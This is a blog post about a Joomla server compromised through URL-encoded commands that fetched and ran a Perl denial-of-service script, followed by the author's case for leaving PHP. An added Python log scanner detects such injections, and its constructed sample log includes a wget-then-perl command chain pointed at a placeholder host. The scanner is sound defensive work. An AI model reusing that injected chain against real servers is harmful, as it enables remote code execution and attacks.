rm -rf Joomla

Joomla was nice, at least to get to know the concept of a CMS. Unfortunately, Joomla itself is a really bad piece of software. It is a so-called model 1 architecture with both view and code in one file, much like JSPs with scriptlets are.

This model 1 architecture basically means that the code is totally unmaintainable and that it can contain a lot of problems hidden in the complexity of the code. One of those problems is that in some parts of the code, Joomla actually uses commands encoded in URLs that will be executed by Joomla when an HTTP request for such a URL is made. This, in combination with the default settings of PHP on my Linux distribution, allowed the server to be hacked some time ago. I detected this only because my local network stopped functioning.

What it did was download a Perl script using wget and then execute it locally. The script itself then launched a denial of service attack, but instead of doing this quietly so as not to be detected, the attack was done so aggressively that my modem could not handle it any more, and since it was also managing DNS in my local network, this resulted in a breakdown of the local network. In a way I was lucky that the attack itself was so stupid, because otherwise the attack could have gone unnoticed.
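As an added example (not from the original post), a small access-log scanner for the pattern described above: it percent-decodes every query-parameter value in each log line, including double-encoded ones, and flags values that contain shell command tokens such as the wget-then-perl chain. The log lines, parameter names and hosts below are constructed placeholders.

```python
import re
from urllib.parse import urlsplit, unquote

# Tokens that have no business in a CMS query-parameter value.
SHELL_INDICATORS = re.compile(
    r"\b(wget|curl|perl|sh|bash|chmod|cd)\b|[;|`]|\$\(|\.\./|/tmp", re.IGNORECASE)

# Minimal Common/Combined Log Format parser: client, method, URL, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def decode_fully(value, rounds=3):
    """Undo repeated percent-encoding; payloads are often double-encoded."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(url):
    """Return (param, decoded_value, sorted indicators) per suspicious value."""
    findings = []
    for pair in urlsplit(url).query.split("&"):
        name, _, raw = pair.partition("=")
        value = decode_fully(raw)
        found = sorted({m.group(0).lower() for m in SHELL_INDICATORS.finditer(value)})
        if found:
            findings.append((name, value, found))
    return findings

def scan_access_log(lines):
    """Return one dict per log line whose URL carries a shell-like payload."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a real tool would count these
        client, _method, url, status = m.groups()
        for name, value, found in suspicious_params(url):
            hits.append({"line": lineno, "client": client, "status": int(status),
                         "param": name, "indicators": found, "value": value})
    return hits

# Constructed sample lines; parameter names and hosts are placeholders.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2006:13:55:36 +0200] "GET /index.php?option=com_content&id=12 HTTP/1.1" 200 4312',
    '198.51.100.9 - - [10/Oct/2006:13:56:01 +0200] "GET /index.php?path=http://placeholder.invalid/x.txt?;wget%20http://placeholder.invalid/dos.pl;perl%20dos.pl HTTP/1.0" 200 118',
    '198.51.100.9 - - [10/Oct/2006:13:56:02 +0200] "GET /index.php?q=%2525%3B%20cd%20/tmp HTTP/1.0" 200 118',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)
```

A 200 status on a flagged request is the one to chase first; a 404 means the injected path never reached PHP.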

Of course, some configuration settings of PHP can reduce the risks a little, but the problem is still there, and who knows what other creative ways there can be to use Joomla to hack a server. Therefore, in a few weeks' time, it will be goodbye Joomla. I am replacing it with Alfresco, a more professional CMS that I can simply run on the application server on which I am already running a lot of applications. And, given the professionalism of the Java community, which I trust much more than the PHP community, this should be a much better solution.

Thinking about it some more, the real problem with PHP is perhaps not even in the language itself. For instance, it is also possible to use a model 1 architecture in Java and to execute commands encoded in request URLs. I don't think the security settings in my application server would prevent the execution of commands, so in theory I am in equal danger with Java. Except, of course, that no one in his right mind in the Java community would ever implement something like this. Model 1 was basically banned even before anyone really used it. Also, the general security awareness in the Java world is high, so no one would ever try to write an application that executes commands encoded in URLs.

No, I think the real problem with PHP is, paradoxically, that everyone can understand it. One could call it a "people's programming language", since almost no development environment or tools are required and because simple results can be obtained quickly (just as one can with JSP and scriptlets). As a result of this, many people without any mentionable design experience can hack together something in PHP. And that shows. I recently saw some small PHP pages for a project, and it was the same there: unmaintainable code from the first version that was written.

This entry was posted in Devops/Linux.